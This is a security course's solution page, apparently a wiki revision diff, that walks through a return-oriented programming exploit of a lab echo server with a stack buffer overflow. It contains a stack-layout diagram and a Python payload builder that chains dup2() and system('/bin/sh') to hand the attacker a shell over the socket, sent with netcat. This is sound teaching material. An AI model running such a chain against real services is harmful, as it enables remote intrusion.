Page ''session:solution:12'', comparing the revision of 2015/07/23 15:20 (Razvan Deaconescu, Echo Service) with the revision of 2020/07/19 12:49 (current).
====== 0x0B. Return Oriented Programming (part 2) (Solutions) ======

The 2020 revision keeps only the title above and the solutions archive link at the end of the page; the walkthrough below is the text of the 2015 revision.

===== Gadget Tut =====

TODO

===== Echo Service =====

<note>
The log file created with [[http://man7.org/linux/man-pages/man1/script.1.html|script]] is {{TODO|this}}. You may use ''cat'' over the script file to print it.
</note>

Going through ''echo_service.c'' we see that ''echo_service()'' calls ''read()'' with a size of ''4096'' bytes, while the destination buffer ''buf'' is only ''1024'' bytes long. The missing bounds check lets us write past the end of ''buf'' and over the saved return address, which we use to mount a return-oriented programming (ROP) attack.

Let's first consider our steps.
  - We will create a payload that overflows ''buf'' and overwrites the saved return address of ''echo_service()'', so that the function's ''ret'' instruction starts the ROP chain.
  - Through the ROP chain we will issue the following calls, as also indicated in the task:
    - ''dup2(sockfd, 1);''
    - ''dup2(sockfd, 0);''
    - ''system("/bin/sh");''
  - We will start the server and then use ''netcat'' to send the payload to the server and trigger the attack.

The two ''dup2()'' calls duplicate the client socket ''sockfd'' onto file descriptors 1 and 0 of the server process, so the shell started by ''system()'' reads its commands from our connection and writes its output back to it.
We aim for the stack to be the one below (lower addresses at the top; each slot is one 32-bit word):<code>
0x00000000
...
start address of buf
...  (padding up to the saved return address)
+--------------------------------+
|   dup2() address               |   <--- overwritten return address of echo_service()
+--------------------------------+
|   pop_pop_ret gadget address   |   <--- return address of dup2(): pops the two arguments below
+--------------------------------+
|   sockfd                       |   <--- first argument of dup2()
+--------------------------------+
|   1                            |   <--- second argument of dup2()
+--------------------------------+
|   dup2() address               |
+--------------------------------+
|   pop_pop_ret gadget address   |
+--------------------------------+
|   sockfd                       |
+--------------------------------+
|   0                            |
+--------------------------------+
|   system() address             |
+--------------------------------+
|   junk                         |   <--- return address of system(); never used
+--------------------------------+
|   "/bin/sh" address            |   <--- argument of system()
+--------------------------------+

...
0xFFFFFFFF
</code>

The ''pop; pop; ret'' gadget placed after each ''dup2()'' address is what chains the calls: when ''dup2()'' returns into the gadget, the two ''pop'' instructions discard the two arguments and ''ret'' transfers control to the next function address in the chain. Because ''system()'' is the last call, its return slot can hold any value. The concrete values (the addresses of ''dup2()'', ''system()'', the gadget and the ''"/bin/sh"'' string, the padding length between ''buf'' and the saved return address, and the number of ''sockfd'') depend on the target binary and its libc and must be determined before building the payload.
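The payload described by the steps and the diagram above, as an added Python example that is not part of the original solution or of its archive. The addresses, the padding length (''ret_offset'') and the ''sockfd'' value are assumptions that must be replaced with values measured on the target; the chain layout itself follows the diagram.

```python
import struct
import sys

# Addresses are placeholders constructed for this example; the real values
# come from the target binary and its libc (e.g. via gdb, objdump, ROPgadget).
DUP2_ADDR = 0xf7e5b6b0      # address of dup2() in libc (hypothetical)
SYSTEM_ADDR = 0xf7e3c0e0    # address of system() in libc (hypothetical)
POP_POP_RET = 0x08048a5b    # a "pop; pop; ret" gadget in the binary (hypothetical)
BINSH_ADDR = 0xf7f5e6d8     # address of a "/bin/sh" string (hypothetical)
JUNK = 0x41414141           # return address slot of system(); never used
READ_SIZE = 4096            # the size passed to read() in echo_service()


def p32(value):
    """Pack one 32-bit little-endian word, as it sits on an x86 stack."""
    return struct.pack("<I", value & 0xffffffff)


def rop_chain(sockfd, dup2=DUP2_ADDR, system=SYSTEM_ADDR,
              pop_pop_ret=POP_POP_RET, binsh=BINSH_ADDR):
    """Words of the chain, in the order they sit on the stack starting at
    the saved return address of echo_service() (see the stack diagram)."""
    return [
        dup2, pop_pop_ret, sockfd, 1,   # dup2(sockfd, 1): stdout -> socket
        dup2, pop_pop_ret, sockfd, 0,   # dup2(sockfd, 0): stdin  -> socket
        system, JUNK, binsh,            # system("/bin/sh"), return slot unused
    ]


def build_payload(ret_offset, sockfd, **addrs):
    """Padding that fills buf and the rest of the frame up to the saved
    return address, followed by the chain.

    ret_offset is the distance in bytes from the start of buf to the saved
    return address. It is at least the 1024 bytes of buf plus whatever the
    compiler placed between buf and the return address, so it has to be
    measured on the target (assumption: caller supplies it).
    """
    chain = b"".join(p32(w) for w in rop_chain(sockfd, **addrs))
    payload = b"A" * ret_offset + chain
    # echo_service() performs one read() of READ_SIZE bytes, so the whole
    # payload has to fit in a single read.
    if len(payload) > READ_SIZE:
        raise ValueError("payload of %d bytes exceeds read() size %d"
                         % (len(payload), READ_SIZE))
    return payload


def unpack_chain(payload, ret_offset):
    """Decode the chain portion of a payload back into 32-bit words, so the
    layout can be checked against the diagram before sending it."""
    chain = payload[ret_offset:]
    return [struct.unpack("<I", chain[i:i + 4])[0]
            for i in range(0, len(chain), 4)]


if __name__ == "__main__":
    # Usage: python3 rop_payload.py RET_OFFSET SOCKFD | nc HOST PORT
    # sockfd is the server's descriptor for our connection; with fds 0-2 and
    # the listening socket open it is often 4, but verify this on the target.
    offset, fd = int(sys.argv[1]), int(sys.argv[2])
    sys.stdout.buffer.write(build_payload(offset, fd))
```

Piping the output into ''netcat'' delivers the padding and the eleven chain words in one write, which the server consumes with its single ''read()''. Keeping the chain as a list of words makes it easy to compare the generated bytes against the diagram with ''unpack_chain()'' before touching the target.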
  
[[http://security.cs.pub.ro/summer-school/res/arc/12-return-oriented-programming-advanced-sol.zip|Solutions archive]]